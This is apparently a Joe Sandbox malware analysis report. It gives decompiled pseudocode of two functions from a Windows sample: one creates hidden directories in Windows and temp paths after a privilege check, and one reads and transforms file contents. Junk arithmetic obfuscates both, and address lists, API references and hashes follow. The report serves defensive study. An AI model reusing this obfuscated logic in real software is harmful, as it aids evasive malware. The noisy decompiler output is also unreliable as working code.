					_t520 =  *0xfae5a0;
					 *((char*)(_t431 + _v16 - 0x138)) = 0;
					asm("fld1");
					asm("faddp st1, st0");
					 *0xfae5a0 = _t520;
					_t225 =  *0xfae5c4; // 0x80000000
					 *0xfae28c = _t225;
					 *0xfae5c4 =  *0xfae5c4 - 1; // executed
					RemoveDirectoryA( &_v316); // executed
				}
				E00F79CC0( &_v316);
				_t135 =  *0xfafc74; // 0x27311b0
				_t436 = _t435 + 4;
				_v313 = 0;
				_t347 = _t135;
				do {
					_t249 =  *_t135;
					_t135 = _t135 + 1;
				} while (_t249 != 0);
				_t136 = _t135 - _t347;
				_t375 =  &_v316 - 1;
				do {
					_t250 =  *(_t375 + 1);
					_t375 = _t375 + 1;
				} while (_t250 != 0);
				_t252 = _t136 >> 2;
				_t420 = _t347;
				memcpy(_t420 + _t252 + _t252, _t420, memcpy(_t375, _t420, _t252 << 2) & 0x00000003);
				_t438 = _t436 + 0x18;
				CreateDirectoryA( &_v316, 0); // executed
				_t141 = 0;
				do {
					_t257 =  *((intOrPtr*)(_t431 + _t141 - 0x138));
					 *((char*)(_t141 + 0xfb0328)) = _t257;
					_t141 = _t141 + 1;
				} while (_t257 != 0);
				if(_t239 == 0) {
					 *0xfb030c = _t239;
				}
				_t258 =  *0xfae11c; // 0xe8ccf6b5
				_t142 =  *0xfae5dc; // 0xf99f
				_v16 = 0x3bbf37ab - _t258;
				asm("fild dword [ebp-0xc]");
				_v16 = _t142 + 0x20a661a8;
				_v28 = _t520;
				asm("fild dword [ebp-0xc]");
				_v12 = _t520;
				 *0xfae11c =  *0xfae11c - 1;
				_t522 =  *0xfae030 + _v12;
				asm("fcomp qword [ebp-0x18]");
				asm("fnstsw ax");
				_t489 = _t142 & 0x00000001;
				if((_t142 & 0x00000001) == 0) {
					_v12 =  *0xfae138 +  *0xfa7f90;
					_t368 =  *0xfae0bc; // 0xdec
					asm("fsubr qword [ebp-0x8]");
					_v16 = _t368;
					_v12 =  *0xfae2c8;
					asm("fild dword [ebp-0xc]");
					 *0xfae0bc = E00F7CABC();
					asm("fld1");
					_t522 =  *0xfae2c8 - st0;
					asm("fxch st0, st1");
					 *0xfae2c8 = _t522;
					asm("fsubr qword [0xfae138]");
					 *0xfae138 = _t522;
				}
				E00F76330(_t489,  &_v316);
				CreateDirectoryA( &_v316, 0); // executed
				_t145 = E00F6CF90(_t489, _t522, 0x22b4, 0x1f);
				_t440 = _t438 + 0xc;
				_t240 = _t145;
				_t262 = _t145;
				do {
					_t351 =  *_t145;
					_t145 = _t145 + 1;
				} while (_t351 != 0);
				_t146 = _t145 - _t262;
				_t421 = _t262;
				_t381 =  &_v316 - 1;
				do {
					_t263 =  *(_t381 + 1);
					_t381 = _t381 + 1;
					_t492 = _t263;
				} while (_t263 != 0);
				_t265 = _t146 >> 2;
				_t268 = memcpy(_t381, _t421, _t265 << 2) & 0x00000003;
				memcpy(_t421 + _t265 + _t265, _t421, _t268);
				_t385 = _t421 + _t268 + _t268;
				 *0xfae328 =  *0xfae328 -  *0xfae0b0;
				_t525 =  *0xfae0b0;
				asm("fld1");
				asm("fsubp st1, st0");
				 *0xfae0b0 = _t525;
				_t422 = E00F6CF90(_t492, _t525, 0x1e44, 0x1f);
				E00F76570(0x1f, _t240);
				E00F78260( &_v56, _t525, _t149);
				E00F76570(0x1f, _t149);
				_t154 = E00F6CEE0( &_v316);
				_t272 =  &_v56;
				_t156 = E00F6A9D0(E00F71FC0(_t154, _t272), _t154,  &_v316, 0x181dd011); // executed
				_t445 = _t440 + 0x40;
				if(_t156 == 0) {
					_t494 =  *0xfb076c - 6;
					if( *0xfb076c < 6) {
						E00F7E0C2( &_v316, 0x104, E00F6CF90(__eflags, _t525, 0xf11, 0x24), "C:\\Users\\hardz");
						E00F76570(0x24, _t162);
						_t275 = _t272 | 0xffffffff;
						 *0xfae588 =  *0xfae588 + _t275;
						_t165 =  *0xfae588; // 0xb5d5
						_t354 =  *0xfae31c; // 0xd3bc
						_v16 = _t354 - _t165 + 0x5001be30;
						_t448 = _t445 + 0x20;
						asm("fild dword [ebp-0xc]");
						_v12 = _t525;
						_t527 =  *0xfae39c + _v12;
						 *0xfae39c = _t527;
						 *0xfae31c =  *0xfae31c + _t275;
						__eflags =  *0xfae31c;
					} else {
						E00F7E0C2( &_v316, 0x104, E00F6CF90(_t494, _t525, 0x219a, 0x12), "C:\\Users\\hardz");
						E00F76570(0x12, _t219);
						_v12 =  *0xfae314;
						_t448 = _t445 + 0x20;
						 *0xfae314 =  *0xfae450 * _v12;
						_t527 =  *0xfae450 +  *0xfa75c8;
						 *0xfae450 = _t527;
					}
					_t167 =  *0xfafc74; // 0x27311b0
					_t358 = _t167;
					do {
						_t276 =  *_t167;
						_t167 = _t167 + 1;
					} while (_t276 != 0);
					_t168 = _t167 - _t358;
					_t387 =  &_v316 - 1;
					do {
						_t277 =  *(_t387 + 1);
						_t387 = _t387 + 1;
					} while (_t277 != 0);
					_t279 = _t168 >> 2;
					_t424 = _t358;
					memcpy(_t424 + _t279 + _t279, _t424, memcpy(_t387, _t424, _t279 << 2) & 0x00000003);
					_t450 = _t448 + 0x18;
					CreateDirectoryA( &_v316, 0);
					_t173 = 0;
					do {
						_t284 =  *((intOrPtr*)(_t431 + _t173 - 0x138));
						 *((char*)(_t173 + 0xfb0328)) = _t284;
						_t173 = _t173 + 1;
					} while (_t284 != 0);
					_t285 =  *0xfae460; // 0x6c98b0f2
					_v16 = _t285 + 0x47807ecd;
					asm("fild dword [ebp-0xc]");
					_v12 = _t527;
					_t529 =  *0xfae218 * _v12;
					 *0xfae218 =  *0xfae218 * _v12;
					E00F76330(_t285 + 0x47807ecd,  &_v316);
					CreateDirectoryA( &_v316, 0);
					_t177 = E00F6CF90(_t285 + 0x47807ecd,  *0xfae218 * _v12, 0x22b4, 0x1f);
					_t452 = _t450 + 0xc;
					_t241 = _t177;
					_t287 = _t177;
					do {
						_t360 =  *_t177;
						_t177 = _t177 + 1;
					} while (_t360 != 0);
					_t178 = _t177 - _t287;
					_t425 = _t287;
					_t393 =  &_v316 - 1;
					do {
						_t288 =  *(_t393 + 1);
						_t393 = _t393 + 1;
						_t503 = _t288;
					} while (_t288 != 0);
					_t290 = _t178 >> 2;
					_t293 = memcpy(_t393, _t425, _t290 << 2) & 0x00000003;
					memcpy(_t425 + _t290 + _t290, _t425, _t293);
					_t385 = _t425 + _t293 + _t293;
					_t422 = E00F6CF90(_t503, _t529, 0x1e44, 0x1f);
					E00F76570(0x1f, _t241);
					E00F78260( &_v56, _t529, _t181);
					_t187 = E00F6A9D0(E00F71FC0(E00F6CEE0(E00F76570(0x1f, _t181)),  &_v56), _t185,  &_v316, 0x181dd011);
					_t445 = _t452 + 0x40;
					if(_t187 == 0) {
						GetTempPathA(0x104,  &_v316);
						_t189 =  &_v316;
						_t362 = _t189 + 1;
						do {
							_t299 =  *_t189;
							_t189 = _t189 + 1;
						} while (_t299 != 0);
						_t532 =  *0xfae5ac -  *0xfa7f88 +  *0xfa7f84;
						 *0xfae0c4 = E00F7CABC();
						_t192 = _t189 - _t362 - 2;
						if(_t192 > 0) {
							while( *((char*)(_t431 + _t192 - 0x138)) != 0x5c) {
								_t192 = _t192 - 1;
								if(_t192 > 0) {
									continue;
								} else {
								}
								goto L50;
							}
							 *((char*)(_t431 + _t192 - 0x137)) = 0;
							_t217 =  *0xfae294; // 0x3b89
							_v16 = _t217;
							asm("fild dword [ebp-0xc]");
							_v20 = _t532;
							_v12 =  *0xfae0f4;
							_v12 =  *0xfae078 + _v12;
							asm("fsubr qword [ebp-0x8]");
							asm("fsubr qword [ebp-0x10]");
							 *0xfae294 = E00F7CABC();
							_t532 =  *0xfae0f4;
							asm("fld1");
							asm("faddp st1, st0");
						}
						L50:
						_t193 = 0;
						do {
							_t300 =  *((intOrPtr*)(_t431 + _t193 - 0x138));
							 *((char*)(_t193 + 0xfb0328)) = _t300;
							_t193 = _t193 + 1;
							_t510 = _t300;
						} while (_t300 != 0);
						E00F76330(_t510,  &_v316);
						CreateDirectoryA( &_v316, 0);
						_t197 = E00F6CF90(_t510, _t532, 0x22b4, 0x1f);
						_t458 = _t445 + 0xc;
						_t242 = _t197;
						_t427 = _t197;
						do {
							_t301 =  *_t197;
							_t197 = _t197 + 1;
						} while (_t301 != 0);
						_t198 = _t197 - _t427;
						_t398 =  &_v316 - 1;
						do {
							_t302 =  *(_t398 + 1);
							_t398 = _t398 + 1;
							_t513 = _t302;
						} while (_t302 != 0);
						_t304 = _t198 >> 2;
						_t307 = memcpy(_t398, _t427, _t304 << 2) & 0x00000003;
						memcpy(_t427 + _t304 + _t304, _t427, _t307);
						_t385 = _t427 + _t307 + _t307;
						_t422 = E00F6CF90(_t513, _t532, 0x1e44, 0x1f);
						E00F76570(0x1f, _t242);
						 *0xfae0f8 =  *0xfae0f8 - 1;
						_t309 =  *0xfae0f8; // 0x1e53
						 *0xfae340 = ( *0xfae340 & 0x0000ffff) * (_t309 + 0xcf8a4054);
						E00F78260( &_v56, _t532, _t201);
						E00F76570(0x1f, _t201);
						_t210 = E00F6A9D0(E00F71FC0(E00F6CEE0( &_v316),  &_v56), _t208,  &_v316, 0x181dd011);
						_t445 = _t458 + 0x40;
						if(_t210 == 0) {
							GetTempPathA(0x104,  &_v316);
							_t212 = 0;
							do {
								_t314 =  *((intOrPtr*)(_t431 + _t212 - 0x138));
								 *((char*)(_t212 + 0xfb0328)) = _t314;
								_t212 = _t212 + 1;
								_t515 = _t314;
							} while (_t314 != 0);
							_t315 = E00F6CF90(_t515, _t532, 0x22b4, 0x1f);
							_t463 = _t445 + 8;
							_t366 = _t315;
							do {
								_t243 =  *_t315;
								_t315 = _t315 + 1;
							} while (_t243 != 0);
							_t422 = _t366;
							_t367 = _t315 - _t366;
							_t403 =  &_v316 - 1;
							do {
								_t317 =  *(_t403 + 1);
								_t403 = _t403 + 1;
							} while (_t317 != 0);
							_t319 = _t367 >> 2;
							_t214 = memcpy(_t403, _t422, _t319 << 2);
							_t322 = _t367 & 0x00000003;
							_t519 = _t322;
							memcpy(_t422 + _t319 + _t319, _t422, _t322);
							_t385 = _t422 + _t322 + _t322;
							E00F76570(0x1f, _t214);
							_t445 = _t463 + 0x20;
						}
					}
				}
				E00F76330(_t519,  &_v316);
				SetFileAttributesA( &_v316, 2); // executed
				E00F7C990( &_v316, 0, 0x104);
				return E00F73030( &_v56, _t385, _t422);
			}

0x00f652e0
0x00f652e9
0x00f652fa
0x00f652ff
0x00f65304
0x00f6530b
0x00f6530e
0x00f65318
0x00f6531e
0x00f65323
0x00f6532d
0x00f65332
0x00f65338
0x00f65449
0x00f6533e
0x00f65345
0x00f65350
0x00f65353
0x00f65361
0x00f6536a
0x00f6536b
0x00f65372
0x00f65375
0x00f65378
0x00f65384
0x00f65389
0x00f6538f
0x00f65391
0x00f65397
0x00f65397
0x00f65399
0x00f6539a
0x00f653a4
0x00f653a6
0x00f653a8
0x00f653b0
0x00f653b0
0x00f653b3
0x00f653b4
0x00f653ba
0x00f653cd
0x00f653cf
0x00f653e1
0x00f653e3
0x00f653e6
0x00f653e8
0x00f653e8
0x00f653ea
0x00f653eb
0x00f653f7
0x00f653f9
0x00f653fb
0x00f65400
0x00f65400
0x00f65403
0x00f65404
0x00f65404
0x00f6540a
0x00f6540d
0x00f65417
0x00f65419
0x00f6541e
0x00f65427
0x00f65433
0x00f65439
0x00f6543e
0x00f65441
0x00f65441
0x00f65464
0x00f6546c
0x00f65492
0x00f65497
0x00f6549c
0x00f654a5
0x00f654aa
0x00f654c6
0x00f654cc
0x00f654d2
0x00f654da
0x00f654dc
0x00f654de
0x00f654e4
0x00f654e9
0x00f654ef
0x00f654f5
0x00f654f5
0x00f65502
0x00f65507
0x00f6550c
0x00f6550f
0x00f65516
0x00f65518
0x00f65518
0x00f6551a
0x00f6551b
0x00f65525
0x00f65527
0x00f65528
0x00f65528
0x00f6552b
0x00f6552c
0x00f65532
0x00f65535
0x00f65547
0x00f65547
0x00f65549
0x00f6554f
0x00f65551
0x00f65551
0x00f65558
0x00f6555e
0x00f6555f
0x00f65565
0x00f65567
0x00f65567
0x00f6556d
0x00f65573
0x00f65583
0x00f6558c
0x00f6558f
0x00f65592
0x00f65595
0x00f65598
0x00f655a1
0x00f655a7
0x00f655aa
0x00f655ad
0x00f655af
0x00f655b2
0x00f655c0
0x00f655c9
0x00f655d0
0x00f655d6
0x00f655d9
0x00f655dc
0x00f655e7
0x00f655f3
0x00f655f5
0x00f655f7
0x00f655f9
0x00f655ff
0x00f65605
0x00f65605
0x00f65612
0x00f65623
0x00f65630
0x00f65635
0x00f65638
0x00f6563a
0x00f65640
0x00f65640
0x00f65642
0x00f65643
0x00f6564d
0x00f6564f
0x00f65651
0x00f65652
0x00f65652
0x00f65655
0x00f65656
0x00f65656
0x00f65668
0x00f6566f
0x00f65672
0x00f65672
0x00f65674
0x00f6567a
0x00f65680
0x00f65682
0x00f65684
0x00f65699
0x00f6569b
0x00f656a7
0x00f656af
0x00f656c6
0x00f656cc
0x00f656d5
0x00f656da
0x00f656df
0x00f656e5
0x00f656ec
0x00f6576a
0x00f65772
0x00f65777
0x00f6577a
0x00f65781
0x00f65787
0x00f6579a
0x00f6579d
0x00f657a0
0x00f657a3
0x00f657ac
0x00f657af
0x00f657b5
0x00f657b5
0x00f656ee
0x00f6570e
0x00f65716
0x00f65721
0x00f65724
0x00f65730
0x00f6573c
0x00f65742
0x00f65742
0x00f657bc
0x00f657c1
0x00f657c3
0x00f657c3
0x00f657c5
0x00f657c6
0x00f657d0
0x00f657d2
0x00f657d3
0x00f657d3
0x00f657d6
0x00f657d7
0x00f657dd
0x00f657e0
0x00f657f2
0x00f657f2
0x00f657f4
0x00f657fa
0x00f65800
0x00f65800
0x00f65807
0x00f6580d
0x00f6580e
0x00f65812
0x00f6581e
0x00f65821
0x00f6582b
0x00f65834
0x00f65837
0x00f6583d
0x00f6584e
0x00f6585b
0x00f65860
0x00f65863
0x00f65865
0x00f65867
0x00f65867
0x00f65869
0x00f6586a
0x00f65874
0x00f65876
0x00f65878
0x00f65880
0x00f65880
0x00f65883
0x00f65884
0x00f65884
0x00f6588a
0x00f65891
0x00f6589b
0x00f6589b
0x00f658a5
0x00f658a7
0x00f658b3
0x00f658e1
0x00f658e6
0x00f658eb
0x00f658fd
0x00f65903
0x00f65909
0x00f65910
0x00f65910
0x00f65912
0x00f65913
0x00f65927
0x00f65932
0x00f65937
0x00f6593c
0x00f65940
0x00f6594a
0x00f6594d
0x00000000
0x00000000
0x00f6594f
0x00000000
0x00f6594d
0x00f65951
0x00f65959
0x00f65962
0x00f65965
0x00f65968
0x00f65971
0x00f6597d
0x00f65986
0x00f65989
0x00f65991
0x00f65997
0x00f6599d
0x00f6599f
0x00f6599f
0x00f659a7
0x00f659a7
0x00f659b0
0x00f659b0
0x00f659b7
0x00f659bd
0x00f659be
0x00f659be
0x00f659c9
0x00f659da
0x00f659e7
0x00f659ec
0x00f659ef
0x00f659f1
0x00f659f3
0x00f659f3
0x00f659f5
0x00f659f6
0x00f65a00
0x00f65a02
0x00f65a03
0x00f65a03
0x00f65a06
0x00f65a07
0x00f65a07
0x00f65a0d
0x00f65a14
0x00f65a1e
0x00f65a1e
0x00f65a28
0x00f65a2a
0x00f65a2f
0x00f65a36
0x00f65a56
0x00f65a5d
0x00f65a65
0x00f65a8b
0x00f65a90
0x00f65a95
0x00f65aa3
0x00f65aa9
0x00f65ab0
0x00f65ab0
0x00f65ab7
0x00f65abd
0x00f65abe
0x00f65abe
0x00f65ace
0x00f65ad0
0x00f65ad3
0x00f65ad5
0x00f65ad5
0x00f65ad7
0x00f65ad8
0x00f65ae4
0x00f65ae6
0x00f65ae8
0x00f65af0
0x00f65af0
0x00f65af3
0x00f65af4
0x00f65afa
0x00f65afd
0x00f65b02
0x00f65b02
0x00f65b07
0x00f65b07
0x00f65b09
0x00f65b0e
0x00f65b0e
0x00f65a95
0x00f658eb
0x00f65b18
0x00f65b29
0x00f65b3d
0x00f65b53

APIs

GetVersionExA.KERNEL32(00FB0768,00000000,00000001,74CB4EE0), ref: 00F65318

Part of subcall function 00F71CA0: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00F71D0E
Part of subcall function 00F71CA0: CheckTokenMembership.KERNELBASE(00000000,?,00F65323), ref: 00F71D24
Part of subcall function 00F71CA0: FreeSid.ADVAPI32(?), ref: 00F71D35

Part of subcall function 00F666A0: GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00F6673F
Part of subcall function 00F666A0: GetCurrentProcess.KERNEL32(00000000), ref: 00F66770

CreateDirectoryA.KERNELBASE(0000005C,00000000), ref: 00F653CF
DeleteFileA.KERNELBASE(?,?,?,?,?,?,00000000), ref: 00F654AA
RemoveDirectoryA.KERNELBASE(?,?,?,?,?,?,00000000), ref: 00F654F5
CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,00000000), ref: 00F65549

Part of subcall function 00F79CC0: GetWindowsDirectoryA.KERNEL32(00F65507,00000104,00000000,?,00F65507,?,?,?,?,?,?,00000000), ref: 00F79CDF

CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,?,00000000), ref: 00F65623
__snprintf.LIBCMT ref: 00F6570E
CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F657F4

Part of subcall function 00F6CF90: _malloc.LIBCMT ref: 00F6CFC7

__snprintf.LIBCMT ref: 00F6576A

Part of subcall function 00F76570: _memset.LIBCMT ref: 00F76593
Part of subcall function 00F76570: _free.LIBCMT ref: 00F76599

CreateDirectoryA.KERNEL32(?,00000000), ref: 00F6584E
GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000000), ref: 00F658FD
CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,?,00000000), ref: 00F659DA
GetTempPathA.KERNEL32(00000104,?,?,?,?,?,?,00000000), ref: 00F65AA3
SetFileAttributesA.KERNELBASE(?,00000002,?,?,?,?,?,?,00000000), ref: 00F65B29
_memset.LIBCMT ref: 00F65B3D

Strings

\, xrefs: 00F65940
C:\Users\user, xrefs: 00F656FA, 00F65756

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: Directory$Create$FilePathTemp__snprintf_memset$AddressAllocateAttributesCheckCurrentDeleteFreeInitializeMembershipProcProcessRemoveTokenVersionWindows_free_malloc
String ID: C:\Users\user$\
API String ID: 489473072-2487628403
Opcode ID: 6ae98782430f902b3c75820beda0af2c8d2e51c91b0e4a72024ff58c605e9a9b
Instruction ID: bef2763c4370d44de2370fbd0d2828441e9010fe85d51dd0aabd7815c931e904
Opcode Fuzzy Hash: 6ae98782430f902b3c75820beda0af2c8d2e51c91b0e4a72024ff58c605e9a9b
Instruction Fuzzy Hash: 933226B0D0070D9BDB14AB60EC567EE7BB1FF46300F1441A4E985A7296EF701A58FB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F6BC40 Relevance: 9.2, APIs: 6, Instructions: 245
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00F6BC40(CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				long long _v12;
				signed int _v16;
				long long _v20;
				long _v24;
				void _v20508;
				signed char _t54;
				signed int _t55;
				void* _t58;
				intOrPtr _t59;
				intOrPtr _t62;
				intOrPtr _t64;
				long long _t69;
				intOrPtr _t73;
				signed int _t79;
				intOrPtr _t88;
				signed int _t89;
				void* _t91;
				intOrPtr _t94;
				intOrPtr _t95;
				intOrPtr _t97;
				signed int _t98;
				intOrPtr _t99;
				intOrPtr _t100;
				intOrPtr _t101;
				intOrPtr _t112;
				long long _t115;
				intOrPtr _t117;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				intOrPtr _t127;
				void* _t129;
				void* _t130;
				intOrPtr _t153;
				long long _t168;
				long long _t171;

				E00F7CCA0(0x5018);
				 *0xfae0e8 = E00F7CABC();
				_t126 = _t125 | 0xffffffff;
				 *0xfae51c =  *0xfae51c + _t126;
				_v12 =  *0xfae250 -  *0xfa7e40;
				_t54 =  *0xfae51c; // 0x7027
				_v16 = _t54;
				_v12 =  *0xfae170 + _v12;
				asm("fild dword [ebp-0xc]");
				asm("fcomp qword [ebp-0x8]");
				asm("fnstsw ax");
				_t133 = _t54 & 0x00000041;
				if((_t54 & 0x00000041) != 0) {
					_v20 =  *0xfae540 +  *0xfa7e38 +  *0xfa7e34;
					_v12 =  *0xfae25c;
					asm("fsubr qword [ebp-0x8]");
					asm("fcomp qword [ebp-0x10]");
					asm("fnstsw ax");
					_t151 =  *0xfae540;
					asm("fld1");
					asm("faddp st1, st0");
					 *0xfae540 = _t151;
					__eflags = _t54 & 0x00000041;
					if(__eflags == 0) {
						_t123 =  *0xfae498; // 0x3a4fa324
						_v16 = _t123;
						asm("fild dword [ebp-0xc]");
						_v12 = _t151;
						asm("fsubr qword [ebp-0x8]");
						_v12 =  *0xfae210;
						_v12 =  *0xfae528 + _v12;
						_t151 =  *0xfae044 + _v12;
						 *0xfae044 = _t151;
						 *0xfae498 =  *0xfae498 + 1;
						__eflags =  *0xfae498;
					}
				} else {
					_t168 =  *0xfae0a0;
					asm("fld1");
					asm("fsubp st1, st0");
					 *0xfae0a0 = _t168;
					_t124 =  *0xfae350; // 0xdea3a412
					_v16 = _t124;
					asm("fild dword [ebp-0xc]");
					_v12 = _t168;
					_t89 =  *0xfae238; // 0x9ff1
					_v16 = _t89;
					_t171 =  *0xfae0a0 + _v12 -  *0xfa7e3c;
					_v12 = _t171;
					asm("fild dword [ebp-0xc]");
					_t151 = _t171 + _v12;
					 *0xfae238 = E00F7CABC();
				}
				_t55 =  *0xfae478; // 0x8f288571
				_t128 = _a8;
				_v16 = _t55;
				asm("fild dword [ebp-0xc]");
				 *0xfae3a0 = _t151;
				E00F6CB90(_a8, _t133);
				_t94 =  *0xfb0284; // 0x490
				E00F6F090(_t151, _t94);
				_t130 = _t129 + 4;
				_t58 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				 *0xfae4e8 =  *0xfae4e8 + _t126;
				_t91 = _t58;
				_t59 =  *0xfae4e8; // 0x6bb26d6d
				_t95 =  *0xfae0fc; // 0x76e9210e
				_t112 =  *0xfae588; // 0xb5d5
				 *0xfae0fc =  *0xfae0fc + _t126;
				if(_t59 + _t95 != 0x72c3eb08 - _t112) {
					_t151 =  *0xfae110;
					_t88 =  *0xfae5dc; // 0xf99f
					_v16 = _t88 - 0x192e1244;
					asm("fild dword [ebp-0xc]");
					asm("fsubp st1, st0");
					 *0xfae110 = _t151;
					 *0xfae5dc =  *0xfae5dc + _t126;
				}
				if(_t91 == _t126) {
					L12:
					_t97 =  *0xfb0284; // 0x490
					E00F6D240(_t151, _t97);
					_t153 =  *0xfae088 -  *0xfa75c8;
					 *0xfae088 = _t153;
					_t115 =  *0xfae088; // 0xcfbc0000
					_t62 =  *0xfae08c; // 0xc2156e26
					_t98 =  *0xfae024; // 0x80000001
					_v16 = _t98;
					asm("fild dword [ebp-0xc]");
					_v12 = _t115;
					_v8 = _t62;
					asm("fsubr qword [ebp-0x8]");
					 *0xfae170 = _t153 -  *0xfa7e28;
					E00F7C990( &_v20508, 0, 0x5001);
					_t64 =  *0xfae4fc; // 0xc1ce
					_t99 =  *0xfae234; // 0x82cc2880
					_t117 =  *0xfae38c; // 0x93fc1fed
					__eflags = _t117 - _t64 - _t99 + 0xfa57fe7a;
					if(_t117 < _t64 - _t99 + 0xfa57fe7a) {
						 *0xfae188 =  *0xfae188 -  *0xfa75c8;
						_t69 =  *0xfae188; // 0x71800000
						_t100 =  *0xfae18c; // 0x4209846c
						_v12 = _t69;
						_v8 = _t100;
						 *0xfae4b0 =  *0xfae4b0 + _v12;
					}
					__eflags = 0;
					return 0;
				} else {
					_t118 =  *0xfae580; // 0x0
					_t101 =  *0xfae2fc; // 0x87a9e522
					_t127 = _a12;
					_t29 = _t118 + 0xbcedddf; // 0x9378c301
					 *0xfae2fc = _t101 + _t29;
					while(1) {
						ReadFile(_t91,  &_v20508, 0x5000,  &_v24, 0);
						_t73 = E00F71B00(_t151,  &_v20508, 0x1400, _t127);
						_t130 = _t130 + 0xc;
						_t127 = _t73;
						E00F71810(_t128, E00F6CEE0(_t73) + _v24);
						if(E00F75940() == 0) {
							break;
						}
						E00F70A30(_t128,  &_v20508, _v24);
						if(_v24 > 0) {
							continue;
						} else {
							CloseHandle(_t91);
							_t122 =  *0xfb0284; // 0x490
							E00F6D240(_t151, _t122);
							E00F7C990( &_v20508, 0, 0x5001);
							_v12 =  *0xfae1a4;
							asm("fsubr qword [ebp-0x8]");
							_v12 =  *0xfae380;
							 *0xfae5fc =  *0xfae5fc + _v12;
							return 1;
						}
						goto L15;
					}
					_t121 =  *0xfae0bc; // 0xdec
					_t79 = _t121 + 0x680650fd;
					__eflags = _t79;
					_v16 = _t79;
					asm("fild dword [ebp-0xc]");
					_v12 = _t151;
					_t151 =  *0xfae5ac + _v12;
					 *0xfae5ac =  *0xfae5ac + _v12;
					CloseHandle(_t91);
					goto L12;
				}
				L15:
			}

0x00f6bc48
0x00f6bc61
0x00f6bc66
0x00f6bc69
0x00f6bc7c
0x00f6bc85
0x00f6bc91
0x00f6bc94
0x00f6bc97
0x00f6bc9a
0x00f6bc9d
0x00f6bc9f
0x00f6bca2
0x00f6bd09
0x00f6bd12
0x00f6bd1b
0x00f6bd24
0x00f6bd27
0x00f6bd29
0x00f6bd2f
0x00f6bd31
0x00f6bd33
0x00f6bd39
0x00f6bd3c
0x00f6bd3e
0x00f6bd44
0x00f6bd47
0x00f6bd4a
0x00f6bd53
0x00f6bd56
0x00f6bd62
0x00f6bd6b
0x00f6bd6e
0x00f6bd74
0x00f6bd74
0x00f6bd74
0x00f6bca4
0x00f6bca4
0x00f6bcaa
0x00f6bcac
0x00f6bcae
0x00f6bcb4
0x00f6bcba
0x00f6bcbd
0x00f6bcc0
0x00f6bcc9
0x00f6bcd5
0x00f6bcd8
0x00f6bcde
0x00f6bce1
0x00f6bce4
0x00f6bcec
0x00f6bcec
0x00f6bd7a
0x00f6bd7f
0x00f6bd82
0x00f6bd85
0x00f6bd8a
0x00f6bd90
0x00f6bd95
0x00f6bd9c
0x00f6bda4
0x00f6bdb7
0x00f6bdbd
0x00f6bdc3
0x00f6bdc5
0x00f6bdca
0x00f6bdd0
0x00f6bdd7
0x00f6bdeb
0x00f6bded
0x00f6bdf3
0x00f6be02
0x00f6be05
0x00f6be08
0x00f6be0a
0x00f6be10
0x00f6be10
0x00f6be19
0x00f6bf2c
0x00f6bf2c
0x00f6bf33
0x00f6bf3e
0x00f6bf4b
0x00f6bf51
0x00f6bf57
0x00f6bf5c
0x00f6bf62
0x00f6bf65
0x00f6bf68
0x00f6bf6b
0x00f6bf74
0x00f6bf7e
0x00f6bf84
0x00f6bf89
0x00f6bf8f
0x00f6bf95
0x00f6bfa6
0x00f6bfa8
0x00f6bfb6
0x00f6bfbc
0x00f6bfc1
0x00f6bfcd
0x00f6bfd0
0x00f6bfd6
0x00f6bfd6
0x00f6bfde
0x00f6bfe4
0x00f6be1f
0x00f6be1f
0x00f6be26
0x00f6be2c
0x00f6be32
0x00f6be39
0x00f6be40
0x00f6be53
0x00f6be66
0x00f6be6b
0x00f6be70
0x00f6be7d
0x00f6be8b
0x00000000
0x00000000
0x00f6be9a
0x00f6bea3
0x00000000
0x00f6bea5
0x00f6bea6
0x00f6beac
0x00f6beb3
0x00f6bec6
0x00f6bed1
0x00f6bede
0x00f6bee8
0x00f6bef4
0x00f6befd
0x00f6befd
0x00000000
0x00f6bea3
0x00f6befe
0x00f6bf08
0x00f6bf08
0x00f6bf0d
0x00f6bf11
0x00f6bf14
0x00f6bf1d
0x00f6bf20
0x00f6bf26
0x00000000
0x00f6bf26
0x00000000

APIs

CreateFileA.KERNELBASE(02731058,80000000,00000001,00000000,00000003,00000000,00000000,74CB4EE0), ref: 00F6BDB7
ReadFile.KERNEL32(00000000,?,00005000,?,00000000), ref: 00F6BE53
CloseHandle.KERNEL32(00000000,?,?), ref: 00F6BEA6
_memset.LIBCMT ref: 00F6BEC6
CloseHandle.KERNEL32(00000000,?), ref: 00F6BF26
_memset.LIBCMT ref: 00F6BF84

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

